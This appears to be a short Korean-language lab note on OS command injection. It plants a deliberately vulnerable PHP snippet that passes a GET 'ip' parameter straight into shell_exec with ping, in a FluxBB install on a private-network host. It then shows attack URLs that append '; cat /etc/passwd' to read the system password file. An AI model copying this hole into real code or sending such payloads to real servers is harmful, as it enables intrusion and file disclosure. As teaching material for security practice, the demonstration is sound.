원하는 곳에 취약 php 코드 삽입
<?php
if (isset($_GET['ip'])) {
$ip = $_GET['ip'];
// 사용자 입력을 직접 명령어에 삽입 (취약점 존재)
$output = shell_exec("ping -c 4 " . $ip);
echo "<pre>$output</pre>";
} else {
echo "Please provide an IP address.";
}
?>
PHP
복사
브라우저에서 공격
http://192.168.10.133/fluxbb/index.php?ip=192.168.10.2; cat /etc/passwd
PHP
복사
위와 같이 입력하면 아래와 같이
cat /etc/passwd 도 실행됨
http://192.168.10.133/fluxbb/index.php?ip=192.168.10.2;%20cat%20/etc/passwd
PHP
복사
